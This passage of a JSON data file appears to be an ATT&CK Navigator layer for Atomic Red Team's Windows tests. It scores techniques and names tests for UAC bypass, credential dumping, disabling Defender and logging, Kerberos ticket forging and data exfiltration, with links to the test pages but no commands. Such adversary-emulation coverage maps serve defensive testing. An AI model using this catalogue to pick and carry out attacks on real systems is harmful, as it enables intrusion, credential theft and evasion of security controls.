Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM 
Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake 
Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- 
Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- 
DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services 
for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable 
Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with 
NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions 
Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View 
